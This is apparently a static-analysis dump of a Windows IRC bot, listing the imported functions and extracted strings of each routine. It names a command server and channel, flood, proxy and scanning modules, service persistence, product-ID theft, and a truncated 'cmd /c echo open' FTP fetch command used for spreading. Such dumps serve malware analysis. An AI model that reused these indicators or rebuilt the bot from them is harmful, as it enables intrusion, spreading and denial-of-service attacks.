| sub_outside():
	MSVCRT.strtok
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	MSVCRT.strncmp
	KERNEL32.Process32Next
	MSVCRT.strstr
	MSVCRT.strncpy
	MSVCRT.wcscat
	MSVCRT.ftell
	MSVCRT.fseek
	WS2_32.send
	WS2_32.recv
	WS2_32.ntohs
	WS2_32.recvfrom
	WS2_32.inet_ntoa
	MSVCRT.atoi
	MSVCRT.rand
	MSVCRT.free
	MSVCRT.sprintf
	KERNEL32.InterlockedCompareExchange
	MSVCRT._errno
	MSVCRT._iob
 | 
| sub_409580(0076):
	"invalid vector subscript"
 | 
| sub_42D1A0(01e7):
	"%s\n"
 | 
| sub_41A2B0(02c1):
	WS2_32.WSAGetLastError
	WS2_32.select
 | 
| sub_41A6D0(031f):
	WS2_32.select
 | 
| sub_430FE0(03f4):
	KERNEL32.InterlockedCompareExchange
 | 
| sub_4277C0(04b5):
	MSVCRT.rand
	WS2_32.sendto
 | 
| sub_40F0B0(0657):
	"ServicesActive"
 | 
| sub_42CB10(0bfa):
	MSVCRT.fprintf
	MSVCRT.strncmp
	"Control socket read failed"
	"%s"
	"%s"
 | 
| sub_40ED70(0d6a):
	"ServicesActive"
	"\"%s\" %s"
 | 
| sub_4282C0(0e5d):
	MSVCRT.strncat
	MSVCRT.strstr
	WS2_32.recv
	WS2_32.closesocket
	" "
	" "
	"http"
	" "
	"CONNECT"
	"connect"
	" "
	":"
	" "
	":"
	" "
	":"
	" "
	" "
	"HTTPROX"
	"\r\n"
	"\r\n"
	"\r\n"
	"Proxy-Connection:"
	":"
	"Keep-Alive"
	"%s %s	%s\r\nConnection: Keep-Alive\r\n%s"
	"%s %s	%s\r\nConnection: close\r\n%s"
	"\r\n"
	"\r\n"
	" "
	" "
	" "
	"Transfer-Encoding:"
	" "
	"chunked"
	" "
	"Connection:"
	" "
	"Keep-Alive"
	"\r\n"
	"\r\n"
	"\r\n"
	"Connection: Keep-Alive\r\n"
	"Connection: Keep-Alive\r\n"
	"Connection: Close\r\n"
	"Connection: Close\r\n"
	"\r\n"
	"HTTP/1.0 200 Connection established\r\n\r\n"...
	"HTTP/1.0 503 Service Unavailable\r\nServe"...
	"HTTP/1.0 503 Service Unavailable\r\nServe"...
 | 
| sub_413B70(17e9):
	":"
	":"
	":"
 | 
| sub_4192C0(1a48):
	MSVCRT._stricmp
	WS2_32.ntohs
	" "
	"established"
	"listening"
	"%s:%d"
	"%s:%d"
	"%s: %d"
	"%s: %s"
 | 
| sub_42A150(1c59):
	"[%s] Starting	Socks4 Proxy on	port %d."
	"[%s] Unloaded	proxy on %d."
 | 
| sub_40B700(1ff1):
	"true"
 | 
| sub_419F50(25b1):
	MSVCRT.strstr
 | 
| sub_428250(28e3):
	WS2_32.closesocket
 | 
| sub_40FF60(2ab6):
	MSVCRT.strstr
	"%d.%d.%d.%d"
	"%s %s\r\n"
	"%s %s\r\n%s %s 0 0 :%s\r\n"
	" "
	" "
	" "
	" "
	"%s %s\r\n"
	" "
	" "
	" "
	"%s %s\r\n"
	"%s %s %s\r\n"
	" "
	"%s %s %s\r\n"
	"%s %s\r\n"
	" "
	" "
	":"
	"|"
	"|"
	" -s"
	" -n"
	" -o"
	" "
	" "
	"|"
	"|"
	" "
	" -o"
	" -s"
	" -n"
	":"
	" "
	"!"
	"!"
	" "
	" "
	" :"
	" "
	" "
	" "
	" "
	" "
	":"
	"!"
	"%s %s %s\r\n"
	" "
	":"
	"!"
	" :"
	" :"
	" "
	" "
	":"
	"!"
	":"
	"!"
	":"
	"!"
 | 
| sub_423660(2e37):
	"%d.%d.%d.%d"
 | 
| sub_4200F0(2ff6):
	"SYSTEM\\CurrentControlSet\\Services\\%s"
	"ImagePath"
	"\\"
 | 
| sub_40D580(3014):
	"kernel32.dll"
	"RegisterServiceProcess"
	"CreateToolhelp32Snapshot"
	"Process32First"
 | 
| sub_41EF30(35e5):
	WS2_32.send
	MSVCRT.atoi
	"220	\r\n"
	"220 \r\n"
	"331	\r\n"
	"331 \r\n"
	"230	\r\n"
	"230 \r\n"
	"200	\r\n"
	"200 \r\n"
	" "
	","
	","
	","
	","
	","
	","
	"%d.%d.%d.%d"
	"200	\r\n"
	"200 \r\n"
	"150	\r\n"
	"150 \r\n"
	"rb"
	"ftp: %d.%d.%d.%d -> (%d bytes) (total	s"...
	"226	\r\n"
	"226 \r\n"
	"221	\r\n"
	"221 \r\n"
 | 
| sub_4137E0(387f):
	"%2.2X"
 | 
| sub_40C400(3a0c):
	" "
	"[DCC]: Failed	to create socket."
	"dcc: failed to bind socket"
	"dcc: failed to open socket"
	"dcc: file doesn't exist"
	"[DCC]: File doesn't exist."
	"dcc: timeout"
	"dcc: unable to open socket"
	"dcc: complete	to %s, file: %s, (%d byte"...
	"dcc: socket error"
 | 
| sub_422A40(3a7d):
	MSVCRT.atoi
	WS2_32.send
	MSVCRT.strrchr
	"scan: cip (%s)"
	"scan:	not started"
	" "
	"ftp: port: %d, total sends: %d"
	"scan:	stopped	(%d threads)"
	"scan:	couldn't stop"
	" "
	"scan:	too many threads (%s)"
	" "
	"scan: stats:"
	" %s:	%d,"
	" total: %d"
	" "
	" "
	" "
	" "
	" "
	"scan:	invalid	port"
	" "
	" "
	" "
	" -r"
	" -a"
	" -b"
	"scan:	no ip specified"
	" -a"
	" -r"
	" -a"
	"random"
	"sequential"
	"Scan(%s): %s Port Scan %s:%d - Delay %d"...
 | 
| sub_426A60(3ead):
	"%s: %s:%u (%dseconds)"
	"%s: error creating threads"
	"%s: attack@%s:%d done."
	"%s"
 | 
| sub_40F030(3edb):
	"ServicesActive"
 | 
| sub_4356F0(3f07):
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	"HKCR: %s"
	" "
	" "
	"HKU:	%s"
	"Software\\Microsoft\\Windows\\CurrentVersi"...
	"ProductId"
	"Found	Windows	Product	ID (%s)."
 | 
| sub_426820(4314):
	IPHLPAPI.IcmpCreateFile
	IPHLPAPI.IcmpSendEcho
	IPHLPAPI.IcmpCloseHandle
	"ICMP.DLL"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
 | 
| sub_41D830(4371):
	":"
	":"
	":"
	"ftp(badlogin)"
	"ftp(getting)"
	"ftp(baddl)"
	"http(badconnect)"
	"GET %s HTTP/1.0\r\nConnection: Keep-Alive"...
	"http(getting)"
	"wb"
	"http(badopen)"
	"\r\n\r\n"
	"dl, done. %s ."
	"open	%s."
	"dl'ed-update: %s"
	"exec.error"
 | 
| sub_42DE20(45c4):
	"net_write(1) returned	%d, errno = %d\n"
	"net_write(2) returned	%d, errno = %d\n"
 | 
| sub_407790(4bb6):
	"scorti1.dns2go.com"
	"7000"
	"scorti1.dns2go.com"
	"#scop#"
	"#s"
	"servec"
	"hotfixs.exe"
	"hoewrt"
	"TAHY-"
	"abosal7"
	"E10ADC3949BA59ABBE56E057F20F883E"
	"admin.com"
	"TsInternetUser"
 | 
| sub_423760(4bd5):
	MSVCRT.rand
	"%d.%d.%d.%d"
 | 
| sub_42D580(4c45):
	"Invalid direction %d\n"
	"Invalid	mode %c\n"
	"PASV"
	"%u,%u,%u,%u,%u,%u"
 | 
| sub_40DB40(4d6b):
	"%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n"
	"%%comspec%% /c %s	%s"
 | 
| sub_404C70(4ef0):
	" "
	" "
	"exec.error"
	" "
	" "
	"open"
	" "
	" "
	" "
	"%s resolved %s"
	" "
	" "
	"%s -> %s"
	" "
	"resolve.error	%s."
	"%s %s\r\n"
	"%s"
	" "
	"Executed:	%s."
	"exec.error"
	" "
	"%s"
	"%s %s\r\n"
	" "
	"N"
	"Software\\Microsoft\\OLE"
 | 
| sub_414D40(4f91):
	" "
	" "
 | 
| sub_42E400(50da):
	MSVCRT.fread
	MSVCRT.fwrite
	"short	write: passed %d, wrote	%d\n"
	"localfile write"
 | 
| sub_42D2C0(5357):
	MSVCRT.sprintf
	"Missing path argument	for file transfer"...
	"Invalid open type %d\n"
 | 
| sub_426CE0(5814):
	WS2_32.socket
 | 
| sub_42CC50(5e6e):
	"\r\n"
	"read"
 | 
| sub_42A810(5e94):
	WS2_32.select
	WS2_32.socket
	WS2_32.send
 | 
| sub_42F840(646d):
	MSVCRT._errno
 | 
| sub_42B3A0(68e9):
	WS2_32.recv
	WS2_32.send
 | 
| sub_40CBB0(698f):
	" "
	" "
	"\\"
	"Files Found: %d"
 | 
| sub_4266A0(69b7):
	"%s: %s (%utimes/%ubytes/%dms)"
	"[%s] Finished	flooding %s %d Times"
	"[%s] Cannot send pings - Doesn't have D"...
 | 
| sub_4256B0(7228):
	WS2_32.closesocket
 | 
| sub_426EB0(75a9):
	"syn"
 | 
| sub_4269A0(75a9):
	"forsyn"
 | 
| sub_42A090(75a9):
	"Socks4"
 | 
| sub_427590(75a9):
	"udp"
 | 
| sub_426450(75a9):
	"ping"
 | 
| sub_429D00(75a9):
	"Socks4"
 | 
| sub_4299C0(75a9):
	"HTTP"
 | 
| sub_42A5F0(77b7):
	WS2_32.socket
	WS2_32.sendto
	WS2_32.closesocket
 | 
| sub_42B880(7812):
	"[%s] Redirecting from	Port %d	to '%s:%d"...
	"[%s] Finished	redirecting from port %d "...
 | 
| sub_4066E0(7a4c):
	"up:	%dd %dh	%dm"
 | 
| sub_40A180(7c6d):
	MSVCRT.strstr
 | 
| sub_429C30(80fe):
	"[%s] Starting	proxy on %d with SSL."
	"[%s] Starting	proxy on port %d."
	"[%s] Unloaded	proxy on port %d."
 | 
| sub_57DD3A(82a4):
	MSVCRT._iob
	"-_UAc)WSWcr(Fn1[h-("
 | 
| sub_42B540(83d6):
	WS2_32.ioctlsocket
	WS2_32.recv
	WS2_32.send
	WS2_32.closesocket
 | 
| sub_40B680(8930):
	"true"
 | 
| sub_42EA40(89f2):
	MSVCRT.free
	"QUIT"
 | 
| sub_4227F0(902a):
	"asn"
 | 
| sub_4126B0(9060):
	"%d.%d.%d.%d"
 | 
| sub_433A20(9072):
	""
 | 
| sub_4034E0(917c):
	"|"
	"a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t"...
 | 
| sub_40CF60(9810):
	MSVCRT._snprintf
	"%s\\*"
	"Found: %s\\%s"
 | 
| sub_40A0C0(9cfe):
	MSVCRT.strchr
 | 
| sub_419AE0(a03e):
	MSVCRT.strncpy
	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
 | 
| sub_42DFD0(a081):
	MSVCRT.free
 | 
| sub_431280(a438):
	"KERNEL32.DLL"
	"InterlockedCompareExchange"
 | 
| sub_425020(aafe):
	WS2_32.ntohs
	"cmd /c echo open %s %d >> ii &echo user"...
 | 
| sub_42C810(acd5):
	"tcp"
	"ftp"
	"tcp"
 | 
| sub_428040(b1b6):
	"[%s] Started redirect	from \"%s\" to \"%s\""...
	"[%s] Finished	redirect from \"%s\" to	\"%s"...
 | 
| sub_429DC0(b1e7):
	WS2_32.recv
	WS2_32.ioctlsocket
	WS2_32.closesocket
 | 
| sub_41E660(b206):
	"%d. - Pid: %d - \"%s\""
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "
 | 
| sub_41B950(b4fa):
	MSVCRT.rand
 | 
| sub_431560(cbe3):
	MSVCRT.free
 | 
| sub_424840(cd36):
	"BBBB"
	"CCCC"
 | 
| sub_42D0D0(cf06):
	MSVCRT.sprintf
	"USER	%s"
	"PASS	%s"
 | 
| sub_40EF90(cfad):
	"ServicesActive"
 | 
| sub_41C610(d173):
	" "
	":"
	" "
	" "
	":"
	" "
	" "
	":"
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "
	" "
 | 
| sub_41BC90(d56c):
	MSVCRT.strtok
 | 
| sub_420530(deb4):
	"PSAPI.DLL"
	"PSAPI.DLL"
	"EnumProcessModules"
	"GetModuleFileNameExA"
	"unknown"
 | 
| sub_420E10(e23f):
	":"
	"http"
	"ftp"
	"/"
	"/"
	":"
	"/"
	":"
	"http"
	"ftp"
	"/"
	":"
	"/"
	":"
	":"
	"/"
	":"
	"http"
	"ftp"
	"/"
	"/"
	"/"
	"/"
 | 
| sub_427AD0(e51b):
	WS2_32.recv
 | 
| sub_41F860(e5ad):
	MSVCRT.rand
	WS2_32.closesocket
 | 
| sub_424E20(e942):
	WS2_32.send
 | 
| sub_427650(e9eb):
	"%s: %s:%u	(%ut/%ub/%dms)"
	"%s: %s:%d done"
 | 
| sub_404640(eaf3):
	" -o"
	" "
	" "
	" "
	" "
 | 
| sub_426F70(f15c):
	"%s: %s:%u	(%usec/%dms)"
 | 
| sub_406890(f450):
	"95"
	"NT"
	"98"
	"ME"
	"2000"
	"XP"
	"2003"
	"???"
	"%s [%s]"
	"CPU: %dMHz. Memory: %dMB/%dMB. OS: Win "...
 | 
| sub_4207E0(f529):
	"AudioSrv"
	"Browser"
	"CryptSvc"
	"Dhcp"
	"dmserver"
	"Dnscache"
	"ERSvc"
	"Eventlog"
	"EventSystem"
	"FastUserSwitchingCompatibility"
	"helpsvc"
	"lanmanserver"
	"lanmanworkstation"
	"LmHosts"
	"Netman"
	"Nla"
	"PlugPlay"
	"PolicyAgent"
	"ProtectedStorage"
	"RasMan"
	"RpcSs"
	"SamSs"
	"Schedule"
	"seclogon"
	"SENS"
	"ShellHWDetection"
	"Spooler"
	"SSDPSRV"
	"stisvc"
	"TapiSrv"
	"TermService"
	"TrkWks"
	"upnphost"
	"W32Time"
	"winmgmt"
	"WZCSVC"
	"wuauserv"
	"Themes"
	"SYSTEM\\CurrentControlSet\\Services\\%s"
	"[%s] [????.exe] (Unknown key)"
	"ImagePath"
	"[%s] [????.exe]"
	"[%s]	[%s]"
 | 
| sub_411FE0(f666):
	" "
	" "
	"%s"
	" "
	"%s"
	" "
	" "
	"%s %s %s\r\n"
	" "
	"%s %s\r\n"
	" "
	" "
	" "
	" "
	" "
 | 
| sub_41FF90(f698):
	"unknown"
 | 
| sub_40EC30(f82c):
	"-netsvcs"
 | 
| sub_420300(f84f):
	"ServicesActive"
 | 
| sub_431900(f851):
	MSVCRT.free
 | 
| sub_42AEC0(fa28):
	WS2_32.accept
 |